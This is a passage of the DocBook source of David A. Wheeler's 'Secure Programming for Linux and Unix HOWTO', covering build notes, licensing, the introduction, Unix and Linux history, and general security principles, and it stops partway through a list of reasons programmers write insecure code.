
<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook V4.1//EN">

<!-- "Secure Programming for Linux and Unix HOWTO",
     Copyright (C) 1999-2003 David A. Wheeler
     http://www.dwheeler.com/secure-programs  -->

<!-- WARNING!!! This book is MUCH LARGER than the tiny little HOWTO's
     that you may be used to, and I've found that you have to
     reconfigure certain tools and use some tools carefully
     for this book to be produced properly.

     TeX's default save-size is TOO SMALL to print this large book.
     You need to modify the TeX configuration file "texmf.cnf"; this is in
     "/usr/share/texmf/web2c" on Red Hat Linux 7.1, and in "/etc" on some
     other systems.  Change the entry saying:
        save_size.pdfjadetex = 5000
     to a larger size, say:
        save_size.pdfjadetex = 30000

     Also, for printing you need to change the style slightly using the
     "-d" option, such as:
       db2ps -d dwheeler-book-style.dsl Secure-Programs-HOWTO.sgml
     Otherwise, the URLs run right off the right-hand side of the page
     in the printed versions and it's really awful.

     When generating the PDF, generate the Postscript and then
     translate that to PDF.  That has its disadvantages, but the
     "db2pdf" can't handle figures properly (the TeX intermediate stage
     can't handle .eps, and DocBook won't let you insert .pdf).
     Ideally mediaobject would be more flexible than this..!

     This is a book, so it should follow book conventions.  This means
     the first pages should be numbered with roman numerals
     (the first page of chapter 1 becomes page 1), and that chapters always
     begin on the right-hand side (odd numbered pages).  Currently, the
     Docbook tools don't do this - UGH!  However, there are patches to do it -
     http://www.mail-archive.com/docbook-apps@lists.oasis-open.org/msg02364.html
     (Re: DOCBOOK-APPS: preface page numbering)
     From: camille
     Subject: Re: DOCBOOK-APPS: preface page numbering
     Date: Fri, 24 Aug 2001 00:41:15 -0700
     Mentions this - apply twosidestartonright.patch.bz2 and features.patch.bz2
     (had to change the %top-margin% when using the patched openjade).
     The "features" patch (Francis J. Lacoste's) must be applied first.
-->


<!-- This is a sample comment.
     This book has had more titles than I'd like to think about. It was
     originally titled "How to Write Secure Programs for Linux", then
     "Design and Implementation Guidelines for Secure Linux Applications".
     I first released it widely as the
     "Secure Programming for Linux HOWTO", and then it morphed into the
     "Secure Programming for Linux and Unix HOWTO".

     You can get the latest version of this book from:
     http://www.dwheeler.com/secure-programs/

     Note that this is the DocBook DTD version!
     To process it, get DocBook tools. If you are using Cygnus's tools, do this:
       db2html Secure*.sgml
       db2ps   Secure*.sgml

    Earlier versions through version 1.60 used the Linuxdoc DTD;
    Version 2.00 has the same content as 1.60, but in DocBook format.
    While the book is now legal DocBook content, it's not "fully"
    marked-up; suggestions on missing markings welcome.


-->

<!--
??? Need to add material from Oliver Friedrichs <of@securityfocus.com>
http://www.securityfocus.com/forums/secprog/secure-programming.html
backup copy at:
http://www.cli.di.unipi.it/~zoppi/docs/secprog.html
now cached at:
http://www.google.com/search?q=cache:DpVgMo24NZQ:www.securityfocus.com/forums/secprog/secure-programming.html+%22Oliver+Friedrichs%22+%22secure+programming%22&hl=en
especially code examples.  This will add Windows-related material, so
I'll change the title to be more inclusive and add summary materials about
Windows' security approaches.  This will involve a modification of many
areas, since most of the text assumes a Unix-like only viewpoint.

??? Should look at Razvan Peteanu <razvan.peteanu@home.com>'s material at
http://members.home.net/razvan.peteanu/Best%20Practices%20for%20Secure%20Web%20Development%203.0.pdf
to see if I've missed anything.

??? Examine other material:
LSAP FAQ http://lsap.org/faq.txt
http://www.w3.org/Security/Faq/www-security-faq.html
http://security.devx.com/ See Best Defense Tab & more defense articles.
http://members.home.net/razvan.peteanu/
http://www.shmoo.com/securecode/
http://www.securityfocus.com/frames/?content=/forums/secprog/intro.html  A listserve on the subject.
http://heap.nologin.net/aspsec.html
http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog1.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog2.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog3.html
and so on till
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog8.html
Good developer oriented resources:
http://www-106.ibm.com/developerworks/security/
http://www.boran.com/security/it13-applications.html

Some code review sites:
http://www.homeport.org/~adam/review.html
http://www.mozilla.org/hacking/reviewers.html
http://www.dnaco.net/~kragen/security-holes.html

I have other links at http://heap.nologin.net/programming.html which may be
of interest, but those seemed most relevant.


For general statistics on computer crime, see the FBI/CSI
"Computer Crime and Security Survey", e.g.,
http://www.gocsi.com/press/20020407.html


-->


<book>

<bookinfo>

<!-- bookbiblio -->

<title>Secure Programming for Linux and Unix HOWTO</title>
<author>
<firstname>David</firstname> <othername role="mi">A.</othername><surname>Wheeler</surname>
</author>
<address><email>dwheeler@dwheeler.com</email></address>
<pubdate>v3.010, 3 March 2003</pubdate>
<edition>v3.010</edition>
<!-- FYI: The LDP claims they don't use the "edition" tag.  -->
<copyright>
 <year>1999</year>
 <year>2000</year>
 <year>2001</year>
 <year>2002</year>
 <year>2003</year>
 <holder>David A. Wheeler</holder>
</copyright>

<legalnotice>
<para>
This book is Copyright (C) 1999-2003 David A. Wheeler.
Permission is granted to copy, distribute and/or modify
this book under the terms of the GNU Free Documentation License (GFDL),
Version 1.1 or any later version published by the Free Software Foundation;
with the invariant sections being ``About the Author'',
with no Front-Cover Texts, and no Back-Cover Texts.
A copy of the license is included in the section entitled
"GNU Free Documentation License".
This book is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
</para>
</legalnotice>

<abstract>
<para>
This book provides a set of design and implementation
guidelines for writing secure programs for Linux and Unix systems.
Such programs include application programs used as viewers of remote data,
web applications (including CGI scripts),
network servers, and setuid/setgid programs.
Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl,
and Ada95 are included.
For a current version of the book, see
<ulink url="http://www.dwheeler.com/secure-programs">
http://www.dwheeler.com/secure-programs</ulink>.
</para>
</abstract>

<!-- /bookbiblio -->
<keywordset>
  <keyword>secure programming</keyword>
  <keyword>secure programs</keyword>
  <keyword>secure applications</keyword>
  <keyword>secure</keyword>
  <keyword>programming</keyword>
  <keyword>security</keyword>
  <keyword>Linux</keyword>
  <keyword>Unix</keyword>
  <keyword>hack</keyword>
  <keyword>crack</keyword>
  <keyword>vulnerability</keyword>
  <keyword>buffer overflow</keyword>
  <keyword>design</keyword>
  <keyword>implementation</keyword>
  <keyword>web application</keyword>
  <keyword>web applications</keyword>
  <keyword>CGI</keyword>
  <keyword>setuid</keyword>
  <keyword>setgid</keyword>
  <keyword>C</keyword>
  <keyword>C++</keyword>
  <keyword>Java</keyword>
  <keyword>Perl</keyword>
  <keyword>PHP</keyword>
  <keyword>Python</keyword>
  <keyword>Tcl</keyword>
  <keyword>Ada</keyword>
  <keyword>Ada95</keyword>
</keywordset>

</bookinfo>

<!-- Begin the book -->


<chapter id="introduction">
<title>Introduction</title>

<epigraph>
<attribution>Proverbs 21:22 (NIV)</attribution>
<para>
A wise man attacks the city of the mighty
and pulls down the stronghold in which they trust.
</para>
</epigraph>

<para>
This book describes a set of guidelines for
writing secure programs on Linux and Unix systems.
For purposes of this book, a ``secure program'' is a program
that sits on a security boundary, taking input from a source that does
not have the same access rights as the program.
Such programs include application programs used as viewers of remote data,
web applications (including CGI scripts),
network servers, and setuid/setgid programs.
This book does not address modifying the operating system kernel itself,
although many of the principles discussed here do apply.
These guidelines were developed as a survey of
``lessons learned'' from various sources on how to create such programs
(along with additional observations by the author),
reorganized into a set of larger principles.
This book includes specific guidance for a number of languages,
including C, C++, Java, Perl, PHP, Python, Tcl, and Ada95.
</para>

<para>
You can find the master copy of this book at
<ulink url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>.
This book is also part of the Linux Documentation Project (LDP) at
<ulink
url="http://www.tldp.org">http://www.tldp.org</ulink>.
It's also mirrored in several other places.
Please note that these mirrors, including the LDP copy and/or the
copy in your distribution, may be older than the master copy.
I'd like to hear comments on this book, but please do not send comments
until you've checked to make sure that your comment is valid for the
latest version.
</para>

<para>
This book does not cover assurance measures, software engineering
processes, or quality assurance approaches,
which are important but widely discussed elsewhere.
Such measures include testing, peer review,
configuration management, and formal methods.
Documents specifically identifying sets of development
assurance measures for security issues include
the Common Criteria (CC, [CC 1999]) and the
Systems Security Engineering Capability Maturity Model [SSE-CMM 1999].
Inspections and other peer review techniques are discussed in
[Wheeler 1996].
This book does briefly discuss ideas from the CC, but only as an organizational
aid to discuss security requirements.
More general sets of software engineering processes
are defined in documents such as the
Software Engineering Institute's Capability Maturity Model for Software
(SW-CMM) [Paulk 1993a, 1993b]
and ISO 12207 [ISO 12207].
General international standards for quality systems are defined in
ISO 9000 and ISO 9001 [ISO 9000, 9001].


<!--
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html
Note that ISO 9001-3 is obsolete.
-->
<!-- ??? Ideally have references for these. -->
</para>

<para>
This book does not discuss how to configure a system (or network)
to be secure in a given environment. This is clearly necessary for
secure use of a given program,
but a great many other documents discuss secure configurations.
An excellent general book on configuring Unix-like systems to be
secure is Garfinkel [1996].
Other books for securing Unix-like systems include Anonymous [1998].
You can also find information on configuring Unix-like systems at web sites
such as
<ulink url="http://www.unixtools.com/security.html">http://www.unixtools.com/security.html</ulink>.
Information on configuring a Linux system to be secure is available in a
wide variety of documents including
Fenzi [1999], Seifried [1999], Wreski [1998], Swan [2001],
and Anonymous [1999].
Geodsoft [2001] describes how to harden OpenBSD,
and many of its suggestions are useful for any Unix-like system.
Auditing of existing Unix-like systems is discussed in
Mookhey [2002].
For Linux systems (and eventually other Unix-like systems),
you may want to examine the Bastille Hardening System, which
attempts to ``harden'' or ``tighten'' the Linux operating system.
You can learn more about Bastille at
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>;
it is available for free under the General Public License (GPL).
Other hardening systems include
<ulink url="http://www.grsecurity.net">grsecurity</ulink>.
For Windows 2000, you might want to look at
Cox [2000].
The U.S. National Security Agency (NSA) maintains a set of
security recommendation guides at
<ulink url="http://nsa1.www.conxion.com">http://nsa1.www.conxion.com</ulink>,
including the ``60 Minute Network Security Guide.''
If you're trying to establish a public key infrastructure (PKI) using
open source tools, you might want to look at the
<ulink url="http://ospkibook.sourceforge.net">Open Source PKI Book</ulink>.
More about firewalls and Internet security is found in
[Cheswick 1994].
</para>

<para>
Configuring a computer is only part of Security Management, a larger
area that also covers how to deal with viruses, what kind of
organizational security policy is needed, business continuity plans, and
so on.
There are international standards and guidance for security management.
ISO 13335 is a five-part
technical report giving guidance on security management [ISO 13335].
ISO/IEC 17799:2000 defines a code of practice [ISO 17799];
its stated purpose is to give high-level and general
``recommendations for information security management
for use by those who are responsible for initiating, implementing or
maintaining security in their organization.''
The document specifically identifies itself as
"a starting point for developing organization specific guidance."
It also states that not all of the guidance and controls it contains may be
applicable, and that additional controls not contained may be required.
Even more importantly, they are intended to be
broad guidelines covering a number of areas,
and are not intended to give definitive details or "how-tos".
It's worth noting that the original
signing of ISO/IEC 17799:2000 was controversial;
Belgium, Canada, France, Germany, Italy, Japan and the US
voted <emphasis>against</emphasis> its adoption.
However, it appears that these votes were primarily a protest on
parliamentary procedure, not on the content of the document,
and certainly people are welcome to use ISO 17799 if they find it helpful.
More information about ISO 17799 can be found in NIST's
<ulink url="http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf">
ISO/IEC 17799:2000 FAQ</ulink>.
ISO 17799 is closely related to BS 7799 parts 1 and 2;
more information about BS 7799 can be found at
<ulink url="http://www.xisec.com/faq.htm">http://www.xisec.com/faq.htm</ulink>.
ISO 17799 is currently under revision.
It's important to note that none of these standards
(ISO 13335, ISO 17799, or BS 7799 parts 1 and 2)
is intended to be a detailed set of technical guidelines for software
developers;
they are all intended to provide broad guidelines in a number of areas.
This is important, because software developers who
only follow (for example) ISO 17799 will
generally <emphasis>not</emphasis> produce
secure software - developers need much, much, much
more detail than ISO 17799 provides.
</para>

<para>
The Commonly Accepted Security Practices &amp; Recommendations (CASPR)
project at
<ulink url="http://www.caspr.org">http://www.caspr.org</ulink>
is trying to distill information security knowledge into a series of
papers available to all (under the GNU FDL, so that future
document derivatives will continue to be available to all).
Clearly, security management needs to include keeping up with patches
as vulnerabilities are found and fixed.
Beattie [2002] provides an
interesting analysis of how to determine when to apply patches,
contrasting the risk of a bad patch with the risk of intrusion
(e.g., under certain conditions, patches are optimally
applied 10 or 30 days after they are released).
</para>

<para>
If you're interested in the current state of vulnerabilities, there are
other resources available to use.
The Common Vulnerabilities and Exposures (CVE) list at
<ulink url="http://cve.mitre.org">http://cve.mitre.org</ulink>
gives a standard identifier for each (widespread) vulnerability.
The paper
<ulink url="http://securitytracker.com/learn/securitytracker-stats-2002.pdf">
SecurityTracker Statistics</ulink>
analyzes vulnerabilities to determine which were the
most common.
The Internet Storm Center at
<ulink url="http://isc.incidents.org/">http://isc.incidents.org/</ulink>
shows the prominence of various Internet attacks around the world.
</para>

<para>
This book assumes that the reader understands computer
security issues in general, the general security model of Unix-like systems,
networking (in particular TCP/IP based networks),
and the C programming language.
This book does include some information about the Linux and Unix
programming model for security.
If you need more information on how TCP/IP based networks and protocols
work, including their security protocols, consult general works on
TCP/IP such as [Murhammer 1998].
</para>

<para>
When I first began writing this document, there were many short articles
but no books on writing secure programs.
There are now two other books on writing secure programs.
One is ``Building Secure Software'' by John Viega and Gary McGraw [Viega 2002];
this is a very good book that discusses a number of important security issues,
but it omits a large number of important security problems that are
instead covered here.
Basically, their book selects several important topics and covers them
well, but at the cost of omitting many other important topics.
The Viega book has a little more information for Unix-like systems than for
Windows systems, but much of it is independent of the kind of system.
The other book is ``Writing Secure Code'' by Michael Howard and David LeBlanc
[Howard 2002].
The title of this other book is misleading;
the book is solely about writing secure programs for Windows,
and is basically worthless if you are writing programs for any other system.
This shouldn't be surprising; it's published by Microsoft Press, and its
copyright is owned by Microsoft.
If you are trying to write secure programs for Microsoft's
Windows systems, it's a good book.
Another useful source of secure programming guidance is
<ulink url="http://www.owasp.org/guide">
The Open Web Application Security Project (OWASP)
Guide to Building Secure Web Applications and Web Services</ulink>;
it has more on process, and fewer specifics than this book, but it
has useful material in it.
</para>

<para>
This book covers all Unix-like systems, including Linux and the
various strains of Unix, and it particularly stresses Linux and provides
details about Linux specifically.
There's some material specifically on Windows CE, and in fact much of
this material is not limited to a particular operating system.
If you know relevant information not already included here, please let
me know.
</para>

<para>
This book is copyright (C) 1999-2003 David A. Wheeler and is covered by the
GNU Free Documentation License (GFDL);
see <xref linkend="about-license"> and
<xref linkend="fdl"> for more information.
</para>

<para>
<xref linkend="background">
discusses the background of Unix, Linux, and security.
<xref linkend="features">
describes the general Unix and Linux security model,
giving an overview of the security attributes and operations of
processes, filesystem objects, and so on.
This is followed by the meat of this book, a set of design and implementation
guidelines for developing applications on Linux and Unix systems.
The book ends with conclusions in
<xref linkend="conclusion">,
followed by a lengthy bibliography and appendixes.
</para>

<!-- ???: Reference other taxonomies, such as Bisbey's at
     http://seclab.cs.ucdavis.edu/projects/history/papers/bisb78.pdf
     and see if I should (partially) switch to one of them.
-->
<para>
The design and implementation guidelines are divided into
categories which I believe emphasize the programmer's viewpoint.
Programs accept inputs, process data, call out to other resources,
and produce output, as shown in <xref linkend="abstract-program">;
notionally all security guidelines fit into one of these categories.
I've subdivided ``process data'' into
structuring program internals and approach,
avoiding buffer overflows (which in some cases can also be considered
an input issue),
language-specific information, and special topics.
The chapters are ordered to make the material easier to follow.
Thus, the book chapters giving guidelines discuss
validating all input (<xref linkend="input">),
avoiding buffer overflows (<xref linkend="buffer-overflow">),
structuring program internals and approach (<xref linkend="internals">),
carefully calling out to other resources (<xref linkend="call-out">),
judiciously sending information back (<xref linkend="output">),
language-specific information (<xref linkend="language-specific">),
and finally information on special topics such as how to acquire random
numbers (<xref linkend="special">).
</para>

<figure float="1" id="abstract-program">
    <title>Abstract View of a Program</title>
    <mediaobject>
       <imageobject>
          <imagedata scalefit="1" scale="50" fileref="images/program.eps" format="eps">
       </imageobject>
       <imageobject>
          <imagedata fileref="images/program.png" format="png">
       </imageobject>
       <textobject>
          <phrase>
A program accepts inputs, processes data,
possibly calls out to other programs, and produces output.
          </phrase>
       </textobject>
    </mediaobject>
</figure>

</chapter>

<chapter id="background">
<title>Background</title>

<epigraph>
<attribution>Ezra 4:19 (NIV)</attribution>
<para>
I issued an order and a search was made, and it was found that this
city has a long history of revolt against kings and has been
a place of rebellion and sedition.
</para>
</epigraph>

<sect1 id="history">
<title>History of Unix, Linux, and Open Source / Free Software</title>

<sect2 id="unix-history">
<title>Unix</title>

<para>
In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at
AT&amp;T Bell Labs began developing
a small operating system on a little-used PDP-7.
The operating system was soon christened Unix, a pun on an earlier operating
system project called MULTICS.
In 1972-1973 the system was rewritten in the programming language C,
an unusual step that was visionary: due to this decision, Unix was
the first widely-used operating system that
could switch from and outlive its original hardware.
Other innovations were added to Unix as well, in part due to synergies
between Bell Labs and the academic community.
In 1979, the ``seventh edition'' (V7) version
of Unix was released, the grandfather of all extant Unix systems.
</para>

<para>
After this point, the history of Unix becomes somewhat convoluted.
The academic community, led by Berkeley, developed a variant called the
Berkeley Software Distribution (BSD), while AT&amp;T continued developing
Unix under the names ``System III'' and later ``System V''.
In the late 1980's through early 1990's
the ``wars'' between these two major strains raged.
After many years each variant adopted many of the key features of the other.
Commercially, System V won the ``standards wars'' (getting most of its
interfaces into the formal standards), and
most hardware vendors switched to AT&amp;T's System V.
However, System V ended up incorporating many BSD innovations, so the
resulting system was more a merger of the two branches.
The BSD branch did not die, but instead became widely used
for research, for PC hardware, and for
single-purpose servers (e.g., many web sites use a BSD derivative).
</para>

<para>
The result was many different versions of Unix,
all based on the original seventh edition.
Most versions of Unix were proprietary and maintained by their respective
hardware vendor; for example, Sun Solaris is a variant of System V.
Three versions of the BSD branch of Unix ended up as open source:
FreeBSD (concentrating on ease-of-installation for PC-type hardware),
NetBSD (concentrating on many different CPU architectures), and
a variant of NetBSD, OpenBSD (concentrating on security).
More general information about Unix history can be found at
<ulink
url="http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm">http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm</ulink>,
<ulink
url="http://perso.wanadoo.fr/levenez/unix">http://perso.wanadoo.fr/levenez/unix</ulink>, and
<ulink url="http://www.crackmonkey.org/unix.html">
http://www.crackmonkey.org/unix.html
</ulink>.
Much more information about the BSD history can be found in
[McKusick 1999] and
<ulink
url="ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree">ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree</ulink>.
</para>

<para>
A slightly old but interesting advocacy piece that presents arguments
for using Unix-like systems (instead of Microsoft's products) is
<ulink
url="http://web.archive.org/web/20010801155417/www.unix-vs-nt.org/kirch">
John Kirch's paper ``Microsoft Windows NT Server 4.0 versus UNIX''
</ulink>.
<!-- Note that researchers prefer Unix-like systems, not Windows; see
     http://www.dyncorp-is.com/darpa/meetings/win98aug/wars.html -->
</para>

</sect2>

<sect2 id="fsf-history">
<title>Free Software Foundation</title>

<para>
In 1984 Richard Stallman began the GNU
project, a project to create a free version of the Unix operating system;
the Free Software Foundation (FSF) was founded in 1985 to support it.
By free, Stallman meant software that could be freely
used, read, modified, and redistributed.
The FSF successfully built a vast number of
useful components, including a C compiler (gcc), an
impressive text editor (emacs), and a host of fundamental tools.
However, in the 1990's the FSF
was having trouble developing the operating system kernel [FSF 1998];
without a kernel their dream of a completely free operating system
would not be realized.
</para>

</sect2>

<sect2 id="linux-history">
<title>Linux</title>

<para>
In 1991 Linus Torvalds began developing an operating system kernel, which
he named ``Linux'' [Torvalds 1999].
This kernel could be combined with the FSF material and other components
(in particular some of the BSD components and MIT's X Window System software) to
produce a freely-modifiable and very useful operating system.
This book will term the kernel itself the ``Linux kernel'' and
the entire combination ``Linux''.
Note that many use the term ``GNU/Linux'' instead for this combination.
</para>

<para>
In the Linux community,
different organizations have combined the available components differently.
Each combination is called a ``distribution'', and the organizations that
develop distributions are called ``distributors''.
Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel,
and Debian.
There are differences between the various distributions,
but all distributions are based on the same foundation: the
Linux kernel and the GNU glibc libraries.
Since both are covered by ``copyleft'' style licenses, changes to
these foundations generally must be made available to all, a
unifying force between the Linux distributions at their foundation
that does not exist between the BSD and AT&amp;T-derived Unix systems.
This book is not specific to any Linux distribution; when it
discusses Linux it presumes Linux
kernel version 2.2 or greater and the C library glibc 2.1 or greater,
valid assumptions for essentially all current major
Linux distributions.
</para>

</sect2>

<sect2 id="oss-history">
<title>Open Source / Free Software</title>

<para>
Increased interest in software that is freely shared
has made it increasingly necessary to define and explain it.
A widely used term is ``open source software'', which is further defined in
[OSI 1999].
Eric Raymond [1997, 1998] wrote several seminal articles examining
its various development processes.
Another widely-used term is ``free software'', where the ``free''
is short for ``freedom'': the usual explanation is ``free speech, not
free beer.''
Neither phrase is perfect.
The term
``free software'' is often confused with programs whose executables are
given away at no charge, but whose source code cannot be viewed, modified,
or redistributed.
Conversely, the term ``open source'' is sometimes (ab)used
to mean software whose
source code is visible, but for which there are limitations on
use, modification, or redistribution.
This book uses the term ``open source'' for its usual meaning, that
is, software which has its source code freely available for
use, viewing, modification, and redistribution; a more detailed
definition is contained in the
<ulink
url="http://www.opensource.org/osd.html">Open Source Definition</ulink>.
In some cases, a difference in motive is suggested;
those preferring the term ``free software'' wish to strongly
emphasize the need for freedom, while those using the term ``open source'' may have
other motives (e.g., higher reliability) or simply wish to appear less
strident.
Information on this definition of free software, and
the motivations behind it, can be found at
<ulink url="http://www.fsf.org">http://www.fsf.org</ulink>.
</para>

<para>
Those interested in reading advocacy pieces for open source software
and free software should see
<ulink
url="http://www.opensource.org">http://www.opensource.org</ulink> and
<ulink
url="http://www.fsf.org">http://www.fsf.org</ulink>.
There are other documents which examine such software, for example,
Miller [1995]
found that open source software was noticeably
more reliable than proprietary software
(using their measurement technique, which measured
resistance to crashing due to random input).
</para>

</sect2>

<sect2 id="linux-vs-unix">
<title>Comparing Linux and Unix</title>

<para>
This book uses the term ``Unix-like'' to describe
systems intentionally like Unix.
In particular, the term ``Unix-like'' includes
all major Unix variants and Linux distributions.
Note that many people simply use the term ``Unix'' to describe these systems
instead.
Originally, the term ``Unix'' meant a particular product developed
by AT&amp;T.
Today, the Open Group owns the Unix trademark, and it defines Unix as
``the worldwide Single UNIX Specification''.
<!-- http://www.unix-systems.org/what_is_unix.html -->
</para>

<para>
Linux is not derived from Unix source code, but its interfaces are
intentionally like Unix.
Therefore, Unix lessons learned generally apply to both, including information
on security.
Most of the information in this book applies to any Unix-like system.
Linux-specific information has been intentionally added to
enable those using Linux to take advantage of Linux's capabilities.
</para>

<para>
Unix-like systems share a number of security mechanisms, though there
are subtle differences and not all systems have all mechanisms available.
All include user and group ids (uids and gids) for each process and
a filesystem with read, write, and execute permissions (for user, group, and
other).
<!-- ???: Most include System V single-machine
     inter-process communication (IPC) mechanisms
      and BSD's socket-based IPC (which support networks). -->
See Thompson [1974] and Bach [1986]
for general information on Unix systems, including their basic
security mechanisms.
<xref linkend="features">
summarizes key security features of Unix and Linux.
</para>

</sect2>

</sect1>

<sect1 id="security-principles">
<title>Security Principles</title>

<para>
There are many general security principles which you should be
familiar with; one good place for general information on information security
is the Information Assurance Technical Framework (IATF) [NSA 2000].
NIST has identified high-level ``generally accepted principles and practices''
[Swanson 1996].
You could also look at a general textbook on computer security, such as
[Pfleeger 1997].
NIST Special Publication 800-27 describes a number of good engineering
principles (although, since they're abstract, they're insufficient for
actually building secure programs - hence this book);
you can get a copy at
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf">
http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf</ulink>.
A few security principles are summarized here.
</para>

<para>
Often computer security objectives (or goals) are described in terms of three
overall objectives:

<itemizedlist>
<listitem>

<para>
<emphasis remap="it">Confidentiality</emphasis> (also known as secrecy), meaning that the
computing system's assets can be read only by authorized parties.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Integrity</emphasis>, meaning that the assets can only be modified or deleted by
authorized parties in authorized ways.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Availability</emphasis>,
meaning that the assets are accessible to the authorized
parties in a timely manner (as determined by the system's requirements).
The failure to meet this goal is called a denial of service.
</para>
</listitem>

</itemizedlist>


Some people define additional major security objectives, while others lump
those additional goals as special cases of these three.
For example, some separately
identify non-repudiation as an objective; this is
the ability to ``prove'' that a sender sent or receiver received a message
(or both), even if the sender or receiver wishes to deny it later.
Privacy is sometimes addressed separately from confidentiality;
some define this as protecting the confidentiality of a
<emphasis>user</emphasis> (e.g., their identity) instead of the data.
Most objectives require identification and authentication, which is
sometimes listed as a separate objective.
Often auditing (also called accountability) is identified
as a desirable security objective.
Sometimes ``access control''  and ``authenticity'' are listed separately
as well.
For example,
the U.S. Department of Defense (DoD), in DoD directive 3600.1
<!-- (both December 9, 1996 and October 2001) -->
defines ``information assurance'' as
``information operations (IO) that protect and defend
information and information systems by ensuring
their availability, integrity, authentication,
confidentiality, and nonrepudiation.
This includes providing for restoration of information systems by
incorporating protection, detection, and reaction capabilities.''
</para>


<!--
It defines ``information operations'' as
``actions taken to affect adversary information, information systems
and decision making, while defending one's own information, information
systems and decision making.''

This is also stated in the
National Security Telecommunications and Information Systems Security Committee
(later renamed to the Committee on National Security Systems)
released the
<ulink url="http://www.nstissc.gov/Assets/pdf/4009.pdf">
``National Information Systems Security (INFOSEC) Glossary''</ulink>
(NSTISSI No. 4009), Sept 2000.

The Industry Advisory Council's Information Assurance (IA)
Special Interest Group (SIG), in their
<ulink url="http://www.iaconline.org/sig_infoassure.html">
Information Assurance Glossary</ulink>, defines information assurance as
``Conducting those operations that protect and defend
information and information systems by ensuring
availability, integrity, authentication, confidentiality,
and non-repudiation.  This includes providing for restoration
of information systems by incorporating protection,
detection and reaction capabilities.''
The U.S. Air Force's AFI 33-204 uses a similar definition for IA;
http://web1.deskbook.osd.mil/htmlfiles/rlframe/REFLIB_Frame.asp?TOC=/htmlfiles/TOC/330fktoc.asp?sNode=R&Exp=N&Doc=/reflib/maf/330fk/330fkdoc.htm&BMK=T2
it defines Information Assurance (IA)
as ``Information operations that protect and defend information
and information systems by ensuring their availability, integrity,
authentication, confidentiality, and nonrepudiation.
This includes providing for restoration of information systems
by incorporating protection, detection, and reaction capabilities.''
-->
<para>
In any case, it is important to identify your program's overall
security objectives, no matter how you group them together,
so that you'll know when you've met them.
</para>

<!-- ???: Reference other classics? Orange Book? CC? See
  http://seclab.cs.ucdavis.edu/projects/history/seminal.html

 Reference other Computer security websites and issues, including:
    http://www.centralwebs.co.uk/Links/secure.html
 Maximum Security's appendix:
    http://www.uzsci.net/documentation/Books/Max_Security/apa/apa.htm

 Multi-player games -
   How to Hurt the Hackers: The Scoop on Internet Cheating
    and How You Can Combat It
   By Matt Pritchard
   Gamasutra
   July 24, 2000
   http://www.gamasutra.com/features/20000724/pritchard_pfv.htm
 -->

<para>
Sometimes these objectives are a response to a known set of threats,
and sometimes some of these objectives are required by law.
For example, for U.S. banks and other financial institutions,
there's a privacy law called the ``Gramm-Leach-Bliley'' (GLB) Act.
This law mandates means of securing customers' personal information,
requires disclosure of the personal information
that will be shared with third parties, and directs institutions to
give customers a chance to opt out of data sharing.
[Jones 2000]
</para>

<para>
There is sometimes conflict between security and some other general
system/software engineering principles.
Security can sometimes interfere with ``ease of use''; for example,
installing a secure configuration may take more effort than a
``trivial'' installation that works but is insecure.
Often this apparent conflict can be resolved; for example, by re-thinking
a problem it's often possible to make a secure system that is also easy to use.
There's also sometimes a conflict between security and abstraction
(information hiding);
for example, some high-level library routines may be implemented securely
or not, but their specifications won't tell you.
In the end, if your application must be secure, you must do things yourself
if you can't be sure otherwise - yes, the library should be fixed, but
it's your users who will be hurt by your poor choice of library routines.
</para>

<para>
A good general security principle is ``defense in depth'';
you should have numerous defense mechanisms (``layers'') in place,
designed so that an attacker has to defeat multiple mechanisms to
perform a successful attack.
</para>

</sect1>

<sect1 id="why-write-insecure">
<title>Why do Programmers Write Insecure Code?</title>
<para>
Many programmers don't intend to write insecure code - but do anyway.
Here are a number of purported reasons for this.
Most of these were collected and summarized by Aleph One on Bugtraq
(in a posting on December 17, 1998):
<!-- Title: Re: Learning security [SUMMARY] -->
<itemizedlist>
<listitem><para>
There is no curriculum that addresses computer security in most schools.
Even when there <emphasis>is</emphasis> a computer security curriculum, it
often doesn't discuss how to write secure programs as a whole.
Many such curricula study only certain areas such as
cryptography or protocols.
These are important, but they often fail to discuss common real-world issues
such as buffer overflows, string formatting, and input checking.
I believe this is one of the most important problems; even those programmers
who go through colleges and universities are very unlikely to learn
how to write secure programs, yet we depend on those very people to
write secure programs.
</para></listitem>
<listitem><para>
Programming books/classes do not teach secure/safe programming techniques.
Indeed, until recently there were no books on how to write secure programs
at all (this book is one of those few).
</para></listitem>
<listitem><para>
No one uses formal verification methods.
</para></listitem>
<listitem><para>
C is an unsafe language, and the standard C library string functions
are unsafe.
This is particularly important because C is so widely used -
the ``simple'' ways of using C permit dangerous exploits.
</para></listitem>
<listitem><para>
Programmers do not think ``multi-user.''
</para></listitem>
<listitem><para>
Programmers are human, and humans are lazy.
Thus, programmers will often use the ``easy'' approach instead of a
secure approach - and once it works, they often fail to fix it later.
</para></listitem>
<listitem><para>
Most programmers are simply not good programmers.
</para></listitem>
<listitem><para>
